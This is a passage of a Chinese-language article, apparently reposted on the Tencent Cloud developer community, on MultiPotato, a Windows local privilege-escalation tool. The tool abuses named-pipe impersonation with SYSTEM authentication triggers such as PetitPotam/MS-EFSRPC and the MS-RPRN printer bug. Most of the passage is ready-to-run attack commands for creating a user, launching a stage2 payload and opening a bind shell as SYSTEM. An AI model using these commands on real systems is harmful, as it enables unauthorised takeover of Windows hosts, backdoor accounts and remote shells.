CreateProcessWithTokenW
用于生成新进程。相反,你可以选择CreateProcessWithTokenW
,CreateProcessAsUserW
,CreateUser
和BindShell
。因此,该项目能够打开 NamedPipe 服务器,模拟连接到它的任何用户,然后执行上述选项之一。如果将来发布任何新的 SYSTEM auth 触发器,此工具仍可用于提升权限 - 在这种情况下,您只需要使用另一个 Pipe-Name。
例子:
c:\temp\MultiPotato> MultiPotato.exe -t CreateUser
默认情况下,您有 60 秒的值(可通过THEAD_TIMEOUT 更改)以让 SYSTEM 帐户或任何其他帐户进行身份验证。例如,这可以通过未修补的 MS-EFSRPC 函数来完成。默认情况下,MultiPotato 侦听管道名称\\.\pipe\pwned/pipe/srvsvc
,该名称旨在与 MS-EFSRPC 结合使用。对于其他 SYSTEM auth 触发器,您可以通过-p
参数调整此值。
c:\temp\MultiPotato> PetitPotamModified.exe localhost/pipe/pwned localhost
使用PetitPotam.py
有效的低特权用户作为远程系统的触发器当然也是可能的。
c:\temp\MultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
并通过触发它
c:\temp\MultiPotato>MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned
重要提示:在我对 MS-RPRN 的测试中,我不能使用 localhost 或 127.0.0.1 作为目标,这必须是网络 IP 地址或 FQDN。此外,需要启用打印机服务才能使其工作。
c:\temp\MultiPotato> MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。